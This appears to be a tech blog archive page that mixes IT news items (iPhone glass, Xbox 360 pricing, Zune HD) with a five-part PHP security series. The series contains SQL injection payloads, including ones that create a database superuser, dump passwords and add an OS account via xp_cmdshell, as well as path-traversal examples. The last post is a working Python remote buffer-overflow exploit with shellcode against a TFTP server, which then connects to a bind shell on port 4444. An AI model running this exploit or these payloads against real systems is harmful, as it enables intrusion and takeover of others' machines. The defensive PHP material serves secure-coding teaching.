GO IT WORLD | IT TECH | IT NEWS

goitworld.com

Aug 31

PHP Code Security Part 5

By jason PHP World No Comments »

User Submitted Data

The greatest weakness in many PHP programs is not inherent in the language itself, but merely an issue of code not being written with security in mind. For this reason, you should always take the time to consider the implications of a given piece of code, to ascertain the possible damage if an unexpected variable is submitted to it.

Example 1 Dangerous Variable Usage

<?php // remove a file from the user's home directory... or maybe // somebody else's? unlink ($evil_var); // Write logging of their access... or maybe an /etc/passwd entry? fwrite ($fp, $evil_var); // Execute something trivial.. or rm -rf *? system ($evil_var); exec ($evil_var); ?>

You should always carefully examine your code to make sure that any variables being submitted from a web browser are being properly checked, and ask yourself the following questions:

Will this script only affect the intended files?
Can unusual or undesirable data be acted upon?
Can this script be used in unintended ways?
Can this be used in conjunction with other scripts in a negative manner?
Will any transactions be adequately logged?

By adequately asking these questions while writing the script, rather than later, you prevent an unfortunate re-write when you need to increase your security. By starting out with this mindset, you won’t guarantee the security of your system, but you can help improve it.

You may also want to consider turning off register_globals, magic_quotes, or other convenience settings which may confuse you as to the validity, source, or value of a given variable. Working with PHP in error_reporting(E_ALL) mode can also help warn you about variables being used before they are checked or initialized (so you can prevent unusual data from being operated upon).

Aug 31

PHP Code Security Part 4

By jason PHP World No Comments »

Using Register Globals

Perhaps the most controversial change in PHP is when the default value for the PHP directive register_globals went from ON to OFF in PHP » 4.2.0. Reliance on this directive was quite common and many people didn’t even know it existed and assumed it’s just how PHP works. This page will explain how one can write insecure code with this directive but keep in mind that the directive itself isn’t insecure but rather it’s the misuse of it.

When on, register_globals will inject your scripts with all sorts of variables, like request variables from HTML forms. This coupled with the fact that PHP doesn’t require variable initialization means writing insecure code is that much easier. It was a difficult decision, but the PHP community decided to disable this directive by default. When on, people use variables yet really don’t know for sure where they come from and can only assume. Internal variables that are defined in the script itself get mixed up with request data sent by users and disabling register_globals changes this. Let’s demonstrate with an example misuse of register_globals:

Example 1 Example misuse with register_globals = on

<?php // define $authorized = true only if user is authenticated if (authenticated_user()) { $authorized = true; } // Because we didn't first initialize $authorized as false, this might be // defined through register_globals, like from GET auth.php?authorized=1 // So, anyone can be seen as authenticated! if ($authorized) { include "/highly/sensitive/data.php"; } ?>

When register_globals = on, our logic above may be compromised. When off, $authorized can’t be set via request so it’ll be fine, although it really is generally a good programming practice to initialize variables first. For example, in our example above we might have first done $authorized = false. Doing this first means our above code would work with register_globals on or off as users by default would be unauthorized.

Another example is that of sessions. When register_globals = on, we could also use $username in our example below but again you must realize that $username could also come from other means, such as GET (through the URL).

Example 2 Example use of sessions with register_globals on or off

<?php // We wouldn't know where $username came from but do know $_SESSION is // for session data if (isset($_SESSION['username'])) { echo "Hello <b>{$_SESSION['username']}</b>"; } else { echo "Hello <b>Guest</b><br />"; echo "Would you like to login?"; } ?>

It’s even possible to take preventative measures to warn when forging is being attempted. If you know ahead of time exactly where a variable should be coming from, you can check to see if the submitted data is coming from an inappropriate kind of submission. While it doesn’t guarantee that data has not been forged, it does require an attacker to guess the right kind of forging. If you don’t care where the request data comes from, you can use $_REQUEST as it contains a mix of GET, POST and COOKIE data. See also the manual section on using variables from external sources.

Example #3 Detecting simple variable poisoning

<?php if (isset($_COOKIE['MAGIC_COOKIE'])) { // MAGIC_COOKIE comes from a cookie. // Be sure to validate the cookie data! } elseif (isset($_GET['MAGIC_COOKIE']) || isset($_POST['MAGIC_COOKIE'])) { mail("admin@example.com", "Possible breakin attempt", $_SERVER['REMOTE_ADDR']); echo "Security violation, admin has been alerted."; exit; } else { // MAGIC_COOKIE isn't set through this REQUEST } ?>

Of course, simply turning off register_globals does not mean your code is secure. For every piece of data that is submitted, it should also be checked in other ways. Always validate your user data and initialize your variables! To check for uninitialized variables you may turn up error_reporting() to show E_NOTICE level errors.

For information about emulating register_globals being On or Off

Tagged with: php security

Aug 30

Apple says it’s not to blame for ‘exploding’ iPhones

By jason IT News World 2 Comments »

Apple’s iPhone may be the darling of the mobile-phone industry right now, but some users in France aren’t singing its praises, claiming that the device explodes or cracks without warning.

However, after conducting an internal investigation into the cause of the broken touch-screen glass, Apple denies that there is an underlying iPhone flaw. In fact, Apple said that in all cases it investigated, some kind of force was applied to the iPhone, causing the glass to break, according to a BBC report Friday.

"The iPhones with broken glass that we have analyzed to date show that in all cases, the glass cracked due to an external force that was applied to the iPhone," Apple said in a statement cited by the BBC.

Last Tuesday, in response to a European Commission investigation into accusations of overheating and exploding iPhones, Apple referred to its internal investigation, saying, "We are waiting to receive the iPhones from the customers."

As part of its investigation, Apple also looked into complaints of the iPhone battery overheating but again said it found no problems. "To date, there are no confirmed battery-overheating incidents for iPhone 3GS, and the number of reports we are investigating is in the single digits," according to the statement.

The investigation’s findings don’t mean much to France’s Frank Benoiton, a consumer who said his wife’s iPhone cracked, and it "was not dropped and experienced no unusual shock," he told the Associated Press.

France’s trade minister declined to comment on a meeting with Apple about an investigation that the country’s consumer protection agency is conducting into the reports, according to Bloomberg.

The European Commission also issued a warning using its rapid-alert system, Rapex, which warns of dangerous consumer products.

Tagged with: battery • exploding • iphone

Aug 29

Microsoft: Xbox 360 Price Drop Timing Coincidental

By jason IT News World 1 Comment »

Welcome to the day after Microsoft lowered the price on its $300 Xbox 360 Elite, wrinkling its brow and lowering its horns to meet Sony’s slimmer, $100 cheaper PlayStation 3 in battle. While the incidentals differ between the two, we’ve officially entered the melee phase of the campaign. The riders are off their horses, lances in the mud, swords drawn, endorsement-and-feature-laden tabards flapping. Welcome to the first day of the headiest holiday game sales season in years.

Microsoft’s director of product management for Xbox Live Aaron Greenberg is doing his best to dismiss assumptions that the Xbox 360′s price drop was reactionary. He’s popped up in several locations in the last 24 hours claiming the timing of the 360′s price drop was simply "coincidental."

I don’t doubt him. It’s that time of year, and getting out in front of the holiday action is essential. In a few weeks, the kids are back in school. Before you know it, the leaves will be turning and we’ll be talking Halo 3: ODST, Gran Turismo PSP, Sony’s PSP Go, Uncharted 2, Dragon Age: Origins, and Modern Warfare 2.

But don’t think for a minute Microsoft and Sony aren’t eyeing each other like tomb raiders squaring off over the Holy Grail. The analysts haven’t weighed in yet, but I’m betting they’ll mark this holiday season as pivotal. Will Sony bite back into Microsoft’s lead? Will Microsoft pull away permanently? Will Nintendo maintain its pole position? Or are its halcyon days finally over? Stand back, because the meaningless rhetoric (but correspondingly meaningful sales deals) could be explosive.

That’s good news, because it means we’re finally well enough along that these systems are becoming affordable. Sony’s PlayStation 3 started off at nigh 3DO price levels, something I think we can all agree at this point was a terrible starter move. And Microsoft…let’s just say I’m amazed that peripherals like a $100 802.11g adapter and $150 120GB hard drive upgrade haven’t incited a Thermidorian Reaction. However cynical it sounds, you do have to admire the latter for getting its "modular" medicine down our throats with spoonfuls of marketing sugar.

Where to next? After I trot out an updated price guide, it’s back to games and services. The PlayStation 3 may be slimmer, and at $300, the Xbox 360 Elite may be "eliter," but in the end, we play games, not boxes.

Tagged with: microsoft • xbox 360

Aug 28

PHP Code Security Part 3

By jason PHP World No Comments »

Error Reporting

With PHP security, there are two sides to error reporting. One is beneficial to increasing security, the other is detrimental.

A standard attack tactic involves profiling a system by feeding it improper data, and checking for the kinds, and contexts, of the errors which are returned. This allows the system cracker to probe for information about the server, to determine possible weaknesses. For example, if an attacker had gleaned information about a page based on a prior form submission, they may attempt to override variables, or modify them:

Example 1 Attacking Variables with a custom HTML page

The PHP errors which are normally returned can be quite helpful to a developer who is trying to debug a script, indicating such things as the function or file that failed, the PHP file it failed in, and the line number which the failure occurred in. This is all information that can be exploited. It is not uncommon for a php developer to use show_source(), highlight_string(), or highlight_file() as a debugging measure, but in a live site, this can expose hidden variables, unchecked syntax, and other dangerous information. Especially dangerous is running code from known sources with built-in debugging handlers, or using common debugging techniques. If the attacker can determine what general technique you are using, they may try to brute-force a page, by sending various common debugging strings:

Example 2 Exploiting common debugging variables

Regardless of the method of error handling, the ability to probe a system for errors leads to providing an attacker with more information.

For example, the very style of a generic PHP error indicates a system is running PHP. If the attacker was looking at an .html page, and wanted to probe for the back-end (to look for known weaknesses in the system), by feeding it the wrong data they may be able to determine that a system was built with PHP.

A function error can indicate whether a system may be running a specific database engine, or give clues as to how a web page or programmed or designed. This allows for deeper investigation into open database ports, or to look for specific bugs or weaknesses in a web page. By feeding different pieces of bad data, for example, an attacker can determine the order of authentication in a script, (from the line number errors) as well as probe for exploits that may be exploited in different locations in the script.

A filesystem or general PHP error can indicate what permissions the web server has, as well as the structure and organization of files on the web server. Developer written error code can aggravate this problem, leading to easy exploitation of formerly "hidden" information.

There are three major solutions to this issue. The first is to scrutinize all functions, and attempt to compensate for the bulk of the errors. The second is to disable error reporting entirely on the running code. The third is to use PHP’s custom error handling functions to create your own error handler. Depending on your security policy, you may find all three to be applicable to your situation.

One way of catching this issue ahead of time is to make use of PHP’s own error_reporting(), to help you secure your code and find variable usage that may be dangerous. By testing your code, prior to deployment, with E_ALL, you can quickly find areas where your variables may be open to poisoning or modification in other ways. Once you are ready for deployment, you should either disable error reporting completely by setting error_reporting() to 0, or turn off the error display using the php.ini option display_errors, to insulate your code from probing. If you choose to do the latter, you should also define the path to your log file using the error_log ini directive, and turn log_errors on.

Example 3 Finding dangerous variables with E_ALL

<?php if ($username) { // Not initialized or checked before usage $good_login = 1; } if ($good_login == 1) { // If above test fails, not initialized or checked before usage readfile ("/highly/sensitive/data/index.html"); } ?>

Tagged with: error reporting • php security

Aug 27

PHP Code Security Part 2

By jason PHP World 1 Comment »

SQL Injection
Many web developers are unaware of how SQL queries can be tampered with, and assume that an SQL query is a trusted command. It means that SQL queries are able to circumvent access controls, thereby bypassing standard authentication and authorization checks, and sometimes SQL queries even may allow access to host operating system level commands.

Direct SQL Command Injection is a technique where an attacker creates or alters existing SQL commands to expose hidden data, or to override valuable ones, or even to execute dangerous system level commands on the database host. This is accomplished by the application taking user input and combining it with static parameters to build a SQL query. The following examples are based on true stories, unfortunately.

Owing to the lack of input validation and connecting to the database on behalf of a superuser or the one who can create users, the attacker may create a superuser in your database.

Example 1:

<?php $offset = $argv[0]; // beware, no input validation! $query = "SELECT id, name FROM products ORDER BY name LIMIT 20 OFFSET $offset;"; $result = pg_query($conn, $query); ?>

Normal users click on the ‘next’, ‘prev’ links where the $offset is encoded into the URL. The script expects that the incoming $offset is a decimal number. However, what if someone tries to break in by appending a urlencode()’d form of the following to the URL

0; insert into pg_shadow(usename,usesysid,usesuper,usecatupd,passwd) select ‘crack’, usesysid, ‘t’,'t’,'crack’ from pg_shadow where usename=’postgres’; –

If it happened, then the script would present a superuser access to him. Note that 0; is to supply a valid offset to the original query and to terminate it.

Note: It is common technique to force the SQL parser to ignore the rest of the query written by the developer with – which is the comment sign in SQL.

A feasible way to gain passwords is to circumvent your search result pages. The only thing the attacker needs to do is to see if there are any submitted variables used in SQL statements which are not handled properly. These filters can be set commonly in a preceding form to customize WHERE, ORDER BY, LIMIT and OFFSET clauses in SELECT statements. If your database supports the UNION construct, the attacker may try to append an entire query to the original one to list passwords from an arbitrary table. Using encrypted password fields is strongly encouraged.

Example 2:

<?php $query = "SELECT id, name, inserted, size FROM products WHERE size = '$size' ORDER BY $order LIMIT $limit, $offset;"; $result = odbc_exec($conn, $query); ?>

The static part of the query can be combined with another SELECT statement which reveals all passwords:

‘ union select ’1′, concat(uname||’-'||passwd) as name, ’1971-01-01′, ’0′ from usertable; –

If this query (playing with the ‘ and –) were assigned to one of the variables used in $query, the query beast awakened.

SQL UPDATE’s are also susceptible to attack. These queries are also threatened by chopping and appending an entirely new query to it. But the attacker might fiddle with the SET clause. In this case some schema information must be possessed to manipulate the query successfully. This can be acquired by examining the form variable names, or just simply brute forcing. There are not so many naming conventions for fields storing passwords or usernames.

Example 3:

<?php $query = "UPDATE usertable SET pwd='$pwd' WHERE uid='$uid';"; ?>

But a malicious user sumbits the value ‘ or uid like’%admin%’; – to $uid to change the admin’s password, or simply sets $pwd to "hehehe’, admin=’yes’, trusted=100 " (with a trailing space) to gain more privileges. Then, the query will be twisted:

<?php // $uid == ' or uid like'%admin%'; -- $query = "UPDATE usertable SET pwd='...' WHERE uid='' or uid like '%admin%'; --"; // $pwd == "hehehe', admin='yes', trusted=100 " $query = "UPDATE usertable SET pwd='hehehe', admin='yes', trusted=100 WHERE ...;"; ?>

A frightening example how operating system level commands can be accessed on some database hosts.

Example 4:

<?php $query = "SELECT * FROM products WHERE id LIKE '%$prod%'"; $result = mssql_query($query); ?>

If attacker submits the value a%’ exec master..xp_cmdshell ‘net user test testpass /ADD’ – to $prod, then the $query will be:

<?php $query = "SELECT * FROM products WHERE id LIKE '%a%' exec master..xp_cmdshell 'net user test testpass /ADD'--"; $result = mssql_query($query); ?>

MSSQL Server executes the SQL statements in the batch including a command to add a new user to the local accounts database. If this application were running as sa and the MSSQLSERVER service is running with sufficient privileges, the attacker would now have an account with which to access this machine.

Note: Some of the examples above is tied to a specific database server. This does not mean that a similar attack is impossible against other products. Your database server may be similarly vulnerable in another manner.

Avoiding techniques

You may plead that the attacker must possess a piece of information about the database schema in most examples. You are right, but you never know when and how it can be taken out, and if it happens, your database may be exposed. If you are using an open source, or publicly available database handling package, which may belong to a content management system or forum, the intruders easily produce a copy of a piece of your code. It may be also a security risk if it is a poorly designed one.

These attacks are mainly based on exploiting the code not being written with security in mind. Never trust any kind of input, especially that which comes from the client side, even though it comes from a select box, a hidden input field or a cookie. The first example shows that such a blameless query can cause disasters.

Never connect to the database as a superuser or as the database owner. Use always customized users with very limited privileges.

Check if the given input has the expected data type. PHP has a wide range of input validating functions, from the simplest ones found in Variable Functions and in Character Type Functions (e.g. is_numeric(), ctype_digit() respectively) and onwards to the Perl compatible Regular Expressions support.

If the application waits for numerical input, consider verifying data with is_numeric(), or silently change its type using settype(), or use its numeric representation by sprintf().

Example 5:

<?php settype($offset, 'integer'); $query = "SELECT id, name FROM products ORDER BY name LIMIT 20 OFFSET $offset;"; // please note %d in the format string, using %s would be meaningless $query = sprintf("SELECT id, name FROM products ORDER BY name LIMIT 20 OFFSET %d;", $offset); ?>

Besides these, you benefit from logging queries either within your script or by the database itself, if it supports logging. Obviously, the logging is unable to prevent any harmful attempt, but it can be helpful to trace back which application has been circumvented. The log is not useful by itself, but through the information it contains. More detail is generally better than less.

Tagged with: php • security • sql injection

Aug 26

PHP Code Security Part 1

By jason PHP World No Comments »

Filesystem Security:

PHP is subject to the security built into most server systems with respect to permissions on a file and directory basis. This allows you to control which files in the filesystem may be read. Care should be taken with any files which are world readable to ensure that they are safe for reading by all users who have access to that filesystem.

Since PHP was designed to allow user level access to the filesystem, it’s entirely possible to write a PHP script that will allow you to read system files such as /etc/passwd, modify your ethernet connections, send massive printer jobs out, etc. This has some obvious implications, in that you need to ensure that the files that you read from and write to are the appropriate ones.

Consider the following script, where a user indicates that they’d like to delete a file in their home directory. This assumes a situation where a PHP web interface is regularly used for file management, so the Apache user is allowed to delete files in the user home directories.

Example 1:

<?php // remove a file from the user's home directory $username = $_POST['user_submitted_name']; $userfile = $_POST['user_submitted_filename']; $homedir = "/home/$username"; unlink("$homedir/$userfile"); echo "The file has been deleted!"; ?>

Since the username and the filename are postable from a user form, they can submit a username and a filename belonging to someone else, and delete it even if they’re not supposed to be allowed to do so. In this case, you’d want to use some other form of authentication. Consider what could happen if the variables submitted were "../etc/" and "passwd". The code would then effectively read:

Example 2:

<?php // removes a file from anywhere on the hard drive that // the PHP user has access to. If PHP has root access: $username = $_POST['user_submitted_name']; // "../etc" $userfile = $_POST['user_submitted_filename']; // "passwd" $homedir = "/home/$username"; // "/home/../etc" unlink("$homedir/$userfile"); // "/home/../etc/passwd" echo "The file has been deleted!"; ?>

There are two important measures you should take to prevent these issues.

Only allow limited permissions to the PHP web user binary.
Check all variables which are submitted.

Here is an improved script:

Example 3:

<?php // removes a file from the hard drive that // the PHP user has access to. $username = $_SERVER['REMOTE_USER']; // using an authentication mechanisim $userfile = basename($_POST['user_submitted_filename']); $homedir = "/home/$username"; $filepath = "$homedir/$userfile"; if (file_exists($filepath) && unlink($filepath)) { $logstring = "Deleted $filepath\n"; } else { $logstring = "Failed to delete $filepath\n"; } $fp = fopen("/home/logging/filedelete.log", "a"); fwrite($fp, $logstring); fclose($fp); echo htmlentities($logstring, ENT_QUOTES); ?>

However, even this is not without its flaws. If your authentication system allowed users to create their own user logins, and a user chose the login "../etc/", the system is once again exposed. For this reason, you may prefer to write a more customized check:

Example 4:

<?php $username = $_SERVER['REMOTE_USER']; // using an authentication mechanisim $userfile = $_POST['user_submitted_filename']; $homedir = "/home/$username"; $filepath = "$homedir/$userfile"; if (!ctype_alnum($username) || !preg_match('/^(?:[a-z0-9_-]|\.(?!\.))+$/iD', $userfile)) { die("Bad username/filename"); } //etc... ?>

Depending on your operating system, there are a wide variety of files which you should be concerned about, including device entries (/dev/ or COM1), configuration files (/etc/ files and the .ini files), well known file storage areas (/home/, My Documents), etc. For this reason, it’s usually easier to create a policy where you forbid everything except for what you explicitly allow.

Tagged with: file system • php security

Aug 24

Microsoft coy on apps for Zune HD

By jason IT News World 1 Comment »

While confirming that the Zune HD now sports an Apps menu, Microsoft is being circumspect on just how extensive the collection of programs it plans to offer for the media player will be.

An eagle-eye user this weekend spotted an Apps menu on some of the devices being demonstrated at Best Buy outlets as part of a preview weekend. Microsoft suggested on Monday that the Apps menu and Zune Marketplace will be home to the types of games found on past Zunes but hedged on whether and when it might offer a broader selection of software.

Microsoft confirms its Zune HD will have an Apps menu, but is being far less clear on just what kinds of Apps it will have.

"Games came pre-loaded on the current version of the device, but we made a decision to take them out of the firmware update and let people choose what games they want to have for themselves–and it made sense to do this via Marketplace," a representative told CNET News. "As before, games are free; the only difference is that people get to choose. Right now, we don’t have anything further to say regarding Apps functionality beyond what we’ve already shared."

Early versions of the device seen by CNET News had a games menu, but the games were similar to the kinds of free games included in the past.

Microsoft suggested that the Apps menu, for the moment, might just be an outlet for such games. However, the company is clearly leaving the door open for much more.

"We have games on the Zune today and those will carry forward to Zune HD, but that’s not where we’ll necessarily stop," Microsoft said.

The Zune HD is slated to go on sale September 15, though Best Buy and Microsoft are also taking pre-orders for the product. A 16GB version will sell for $219, while a 32GB version is priced at $289.

Tagged with: microsoft • Zune • Zune HD

Aug 23

ProSysInfo TFTP Server TFTPDWIN 0.4.2 Remote BOF Exploit

By jason Security Tools 2 Comments »

#!/usr/bin/python

#ProSysInfo TFTP Server TFTPDWIN 0.4.2
#Coded by Wraith

import os
import sys
import struct
import socket
import time

print "\nProSysInfo TFTP Server TFTPDWIN 0.4.2"
print "Note: This vuln is sensitive to different buffer length\n"
if len(sys.argv)!=2:
print "Usage: tftpdwin.py <ip>"
sys.exit(0)

buffer = "\x00\x01\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
buffer += "\x8b\xc3\x66\x05\x12\x01\x50\xc3" + "\x90"*57

buffer += "\x59\x81\xc9\xd3\x62\x30\x20\x41\x43\x4d\x64"
buffer += "\x64\x99\x96\x8D\x7E\xE8\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B\x49\x1C"
buffer += "\x8B\x09\x8B\x69\x08\xB6\x03\x2B\xE2\x66\xBA\x33\x32\x52\x68\x77"
buffer += "\x73\x32\x5F\x54\xAC\x3C\xD3\x75\x06\x95\xFF\x57\xF4\x95\x57\x60"
buffer += "\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59\x20\x03\xDD\x33\xFF"
buffer += "\x47\x8B\x34\xBB\x03\xF5\x99\xAC\x34\x71\x2A\xD0\x3C\x71\x75\xF7"
buffer += "\x3A\x54\x24\x1C\x75\xEA\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B"
buffer += "\x59\x1C\x03\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3B\xF7\x75\xB4"
buffer += "\x5E\x54\x6A\x02\xAD\xFF\xD0\x88\x46\x13\x8D\x48\x30\x8B\xFC\xF3"
buffer += "\xAB\x40\x50\x40\x50\xAD\xFF\xD0\x95\xB8\x02\xFF\x11\x5c\x32\xE4"
buffer += "\x50\x54\x55\xAD\xFF\xD0\x85\xC0\x74\xF8\xFE\x44\x24\x2D\xFE\x44"
buffer += "\x24\x2c\x83\xEF\x6C\xAB\xAB\xAB\x58\x54\x54\x50\x50\x50\x54\x50"
buffer += "\x50\x56\x50\xFF\x56\xE4\xFF\x56\xE8\x90\x90\x90\x90\x90\x90\x90"
buffer += "\x42\xfb\x61\x40\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00"

target = sys.argv[1]
def Connect(target):
connect = "telnet " + target + " 4444"
os.system(connect)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

try:
    s.sendto(buffer, (target,69))
    print "[*] Initiating Buffer Overflow"
    time.sleep(2)
    print "[*] Attempting Connection to Remote Host"
    time.sleep(2)
    print "[*] Please Wait…\n"
    time.sleep(3)
    Connect(target)
    print "\nClosing Remote Connection\n"
    sys.exit(0)
except:
    print "Goodbye\n"

Tagged with: exploit • prosysinfo • remote bof • tftp • tftpdwin

Previous Entries

GO IT WORLD | IT TECH | IT NEWS

PHP Code Security Part 5

User Submitted Data

PHP Code Security Part 4

Apple says it’s not to blame for ‘exploding’ iPhones

Microsoft: Xbox 360 Price Drop Timing Coincidental

PHP Code Security Part 3

Error Reporting

PHP Code Security Part 2

Avoiding techniques

PHP Code Security Part 1

Microsoft coy on apps for Zune HD

ProSysInfo TFTP Server TFTPDWIN 0.4.2 Remote BOF Exploit

Categories

Tag Cloud

Archives

Links

Meta